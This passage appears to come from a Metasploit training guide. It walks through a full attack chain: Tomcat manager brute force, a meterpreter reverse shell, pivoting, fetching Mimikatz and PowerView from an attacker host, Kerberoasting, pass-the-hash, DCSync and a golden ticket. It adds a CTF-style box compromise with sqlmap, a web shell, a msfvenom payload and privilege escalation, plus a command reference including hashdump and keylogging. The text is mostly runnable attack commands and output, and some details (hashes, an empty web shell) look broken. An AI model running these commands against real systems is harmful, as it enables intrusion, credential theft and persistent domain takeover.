8080\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > run\n\n# Result:\n# 203.0.113.50:8080 - TOMCAT_MANAGER - tomcat:s3cretP@ss123! - SUCCESS\n```\n\n**Step 1.4: Deploy Webshell via Tomcat**\n\n```bash\n# Upload WAR with meterpreter\nmsf6 > use exploit/multi/http/tomcat_mgr_upload\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 203.0.113.50\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set USERNAME tomcat\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set PASSWORD s3cretP@ss123!\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set PAYLOAD java/meterpreter/reverse_tcp\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.0.0.5\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set LPORT 4444\nmsf6 exploit(multi/http/tomcat_mgr_upload) > exploit\n\n# Result: Java Meterpreter session on DMZ host (192.168.1.50)\n```\n\n### Phase 2: Internal Reconnaissance\n\n**Step 2.1: Network Enumeration**\n\n```bash\n# From meterpreter session:\nmeterpreter > ipconfig\n# Shows:\n# Interface 11: 192.168.1.50 (DMZ host)\n# Interface 12: 10.10.10.0/24 (Internal network via VLAN)\n\n# Add route to internal network\nmeterpreter > run autoroute -s 10.10.10.0/24\nmsf6 > route add 10.10.10.0 255.255.255.0 1\n\n# Scan internal network through pivot\nmsf6 > use auxiliary/scanner/portscan/tcp\nmsf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.0/24\nmsf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000\nmsf6 auxiliary(scanner/portscan/tcp) > set THREADS 20\nmsf6 auxiliary(scanner/portscan/tcp) > run\n\n# Results:\n# 10.10.10.10 - 22, 80, 443, 445, 3389 (Server)\n# 10.10.10.20 - 22, 80, 443, 3268, 636 (Domain Controller)\n```\n\n**Step 2.2: AD Enumeration**\n\n```bash\n# From meterpreter shell on DMZ:\nmeterpreter > shell\nC:\\> cd C:\\\\Windows\\\\Temp\nC:\\Windows\\Temp> curl http://10.0.0.5/PowerView.ps1 -o PowerView.ps1\nC:\\Windows\\Temp> powershell -ExecutionPolicy Bypass -File PowerView.ps1\nPS C:\\> Import-Module .\\PowerView.ps1\nPS C:\\> Get-NetDomain\n\n# Forest: securecorp.local\n# DomainControllers: DC01, DC02\n\nPS C:\\> Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\n\n# Output:\n# samaccountname serviceprincipalname\n# svc_sql MSSQLSvc/sql01.securecorp.local\n# svc_backup MSSQLSvc/backup.securecorp.local\n# svc_web http/web.securecorp.local\n```\n\n### Phase 3: Kerberoasting\n\n**Step 3.1: Request TGS Tickets**\n\n```bash\n# From meterpreter with PowerShell:\nPS C:\\> IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1')\nPS C:\\> Invoke-Mimikatz -Command '\"kerberos::list /export\"'\n\n# This exports all TGS tickets\n# Alternative: use MSF module\nmsf6 > use auxiliary/admin/kerberos/ticket_export\nset SESSION 1\nset USER svc_sql\nrun\n\n# Crack with hashcat\nhashcat -m 13100 -a 0 tickets.kirbi /usr/share/wordlists/rockyou.txt\n# Result: svc_sql:MyStr0ngP@ssw0rd!\n```\n\n### Phase 4: Lateral Movement\n\n**Step 4.1: Pass-the-Hash to SQL Server**\n\n```bash\n# With cracked svc_sql hash:\nmsf6 > use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.30\nmsf6 exploit(windows/smb/psexec) > set SMBUser svc_sql\nmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99\nmsf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) > exploit\n\n# New session on SQL Server (10.10.10.30)\n```\n\n**Step 4.2: Privilege Escalation to SYSTEM**\n\n```bash\n# On SQL Server session:\nmeterpreter > getsystem -t 3\n[*] Escalating to SYSTEM via reflective DLL...\n[*] Already at SYSTEM privilege level\n\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM\n```\n\n### Phase 5: Domain Dominance\n\n**Step 5.1: DCSync Attack**\n\n```bash\n# Load kiwi and extract krbtgt hash\nmeterpreter > load kiwi\nmeterpreter > dcsync_ntlm SECURECORP\\\\krbtgt\n\n# Output:\n# Hash: 31d6cfe0d16ae931b73c59d7e0c089c0\n# SID: S-1-5-21-1234567890-1234567890-1234567890\n\n# Also get administrator hash\nmeterpreter > dcsync_ntlm SECURECORP\\\\Administrator\n```\n\n**Step 5.2: Golden Ticket Attack**\n\n```bash\n# Create golden ticket\nmeterpreter > golden_ticket_create -d SECURECORP.LOCAL \\\n -k 31d6cfe0d16ae931b73c59d7e0c089c0 \\\n -s S-1-5-21-1234567890-1234567890-1234567890 \\\n -u Administrator \\\n -t /tmp/golden_ticket.kirbi\n\n# Use the ticket\nmeterpreter > kerberos_ticket_use /tmp/golden_ticket.kirbi\n\n# Verify with:\nmeterpreter > getuid\nServer username: SECURECORP\\Administrator\n\n# Now access Domain Controller\nmsf6 > use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.20\nmsf6 exploit(windows/smb/psexec) > set SMBUser Administrator\nmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0\nmsf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) > exploit\n\n# Result: Meterpreter on Domain Controller as SYSTEM\n```\n\n### Phase 6: Documentation & Reporting\n\n**Step 6.1: Export All Data**\n\n```bash\n# Export database\nmsf6 > db_export -f xml /tmp/pentest_report.xml\n\n# Export credentials\nmsf6 > creds all\n\n# Export hosts and services\nmsf6 > hosts -o /tmp/hosts.csv\nmsf6 > services -o /tmp/services.csv\n\n# Export loot\nmsf6 > loot\n```\n\n**Step 6.2: Findings Summary**\n\n```\nFINDINGS SUMMARY\n================\n\nCritical Findings:\n1. CVE-2024-XXXX: Apache Tomcat Manager RCE (CVSS 9.8)\n - Default credentials tomcat:s3cretP@ss123!\n - Allows WAR file deployment\n - Remote code execution as root/SYSTEM\n\n2. Kerberoasting: SPN accounts with weak passwords\n - svc_sql password cracked: MyStr0ngP@ssw0rd!\n - Allowed lateral movement to SQL Server\n\n3. DCSync: Domain admin via krbtgt hash extraction\n - SYSTEM access on any domain server allows DCSync\n - Golden ticket created for persistence\n\nImpact:\n- Full Domain Admin achieved\n- All domain credentials can be extracted\n- Persistent access established via golden ticket\n- Data exfiltration possible from any domain resource\n\nRecommendations:\n1. Remove default Tomcat credentials\n2. Implement strong passwords for SPN accounts\n3. Monitor for DCSync attacks (Event ID 4662)\n4. Implement privileged access workstations\n5. Deploy HoneyTokens for Kerberoast detection\n```\n\n---\n\n## Capstone 2: CTF Challenge \u2014 \"HackTheBox-Style Full Box\"\n\n### Challenge Setup\n\n**Target:** 192.168.56.101 (single VM, VulnHub style)\n\n**Objective:** Capture two flags: `user.txt` and `root.txt`\n\n**Phases:**\n1. Port scanning and enumeration\n2. Web exploitation\n3. Initial shell access\n4. Privilege escalation to user\n5. Root access and flag capture\n\n### Walkthrough\n\n**Step 1: Initial Scan**\n\n```bash\nmsfconsole -q\nmsf6 > db_nmap -sV -sC -A -p- -oA /tmp/htb_scan 192.168.56.101\n\n# Results:\n# PORT STATE SERVICE VERSION\n# 22 open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1\n# 80 open http Apache 2.4.41 (Ubuntu)\n# 3306 open mysql MySQL 8.0.23\n```\n\n**Step 2: Web Enumeration**\n\n```bash\nmsf6 > use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.56.101\nmsf6 auxiliary(scanner/http/dir_scanner) > run\n\n# Found: /admin (phpMyAdmin), /dashboard, /uploads\n```\n\n**Step 3: SQL Injection**\n\n```bash\n# Test for SQL injection on login form\nmsf6 > use auxiliary/scanner/http/sql_injection\n# Manual testing reveals: POST to /login with username parameter is vulnerable\n\n# Use sqlmap to confirm and extract data\n# From attacker machine (not MSF):\nsqlmap -u http://192.168.56.101/login --data=\"username=admin&password=test\" --dbs\n# Database: webapp\n# Extract credentials\nsqlmap -u http://192.168.56.101/login --data=\"username=admin&password=test\" -D webapp -T users --dump\n```\n\n**Step 4: phpMyAdmin Exploitation**\n\n```bash\n# From sqlmap results: root:RootP@ssw0rd!@mysql\n# Use phpMyAdmin to write web shell\nmsf6 > use auxiliary/admin/http/phpmyadmin_superuser\nset RHOSTS 192.168.56.101\nset USERNAME root\nset PASSWORD RootP@ssw0rd!@mysql\nrun\n\n# Write shell via INTO OUTFILE\nmsf6 > use auxiliary/admin/mysql/mysql_sql\nset SQL \"SELECT '' INTO OUTFILE '/var/www/html/shell.php'\"\nrun\n```\n\n**Step 5: Initial Shell**\n\n```bash\n# Access web shell\ncurl http://192.168.56.101/shell.php?cmd=whoami\n# www-data\n\n# Generate and upload meterpreter\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o /tmp/shell.elf\n# Upload via web shell\ncurl -F \"file=@/tmp/shell.elf\" http://192.168.56.101/upload\n# Execute via web shell\ncurl http://192.168.56.101/shell.php?cmd=chmod%20+x%20/tmp/shell.elf%3b/tmp/shell.elf\n```\n\n**Step 6: User Flag**\n\n```bash\n# Meterpreter session established\nmeterpreter > shell\n$ python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n$ cd /home\n$ ls\nubuntu\n$ cat /home/ubuntu/user.txt\nHTB{usr_fl4g_h3r3_m8r7}\n```\n\n**Step 7: Privilege Escalation**\n\n```bash\n# From meterpreter:\n$ find / -perm -4000 -type f 2>/dev/null\n/usr/bin/bash\n/usr/bin/sudo\n\n$ sudo -l\nUser ubuntu may run the following commands on this host:\n (ALL) NOPASSWD: /usr/bin/python3\n\n$ sudo python3 -c 'import os; os.system(\"/bin/bash\")'\n# root shell\n\n$ cat /root/root.txt\nHTB{r00t_fl4g_h3r3_m8r7}\n```\n\n**Step 8: Alternative: Kernel Exploit**\n\n```bash\n# If sudo wasn't available:\n# Check kernel version\n$ uname -a\nLinux 5.4.0-77-generic #86-Ubuntu x86_64\n\n# Search for exploit\nsearchsploit linux kernel 5.4 priv esc\n# EDB: 45010.c - Ubuntu 18.04 privilege escalation\n\n# Download, compile, execute\n$ curl http://10.0.0.5/45010.c -o /tmp/exploit.c\n$ gcc /tmp/exploit.c -o /tmp/exploit\n$ chmod +x /tmp/exploit\n$ /tmp/exploit\n# root\n```\n\n---\n\n## Quick Reference: All Essential MSF Commands\n\n### Module Navigation\n```bash\nmsf6 > search type:exploit name:eternalblue platform:windows\nmsf6 > use exploit/windows/smb/ms17_010_eternalblue\nmsf6 exploit(...) > show options\nmsf6 exploit(...) > show payloads\nmsf6 exploit(...) > set RHOSTS 192.168.1.50\nmsf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(...) > set LHOST 10.0.0.5\nmsf6 exploit(...) > exploit\n```\n\n### Meterpreter Core\n```bash\nmeterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > getpid\nmeterpreter > ps\nmeterpreter > migrate \nmeterpreter > shell\nmeterpreter > background\nmeterpreter > exit\n```\n\n### File Operations\n```bash\nmeterpreter > ls\nmeterpreter > pwd\nmeterpreter > cd /path\nmeterpreter > upload /local /remote\nmeterpreter > download /remote /local\nmeterpreter > search -d / -f *.txt\n```\n\n### Network Operations\n```bash\nmeterpreter > ipconfig\nmeterpreter > netstat\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50\nmeterpreter > run autoroute -s 10.10.10.0/24\n```\n\n### Credential Operations\n```bash\nmeterpreter > hashdump\nmeterpreter > load kiwi\nmeterpreter > creds\nmeterpreter > run post/windows/gather/credentials/credential_collector\n```\n\n### Post-Exploitation\n```bash\nmeterpreter > run post/windows/manage/migrate\nmeterpreter > run post/windows/gather/hashdump\nmeterpreter > run post/windows/gather/enum_logged_on_users\nmeterpreter > keyscan_start\nmeterpreter > keyscan_dump\n```\n\n### Database Operations\n```bash\nmsf6 > db_status\nmsf6 > hosts\nmsf6 > services\nmsf6 > creds\nmsf6 > loot\nmsf6 > notes\nmsf6 > db_import /tmp/scan.xml\nmsf6 > db_export -f xml /tmp/results.xml\n```\n\n### Resource Scripts\n```bash\nmsfconsole -q -r /tmp/script.rc\nmsf6 > makerc /tmp/ops.rc\nmsf6 > resource /tmp/script.rc\n```\n\n---\n\n", "creation_timestamp": "2026-06-13T10:28:11.000000Z"}]}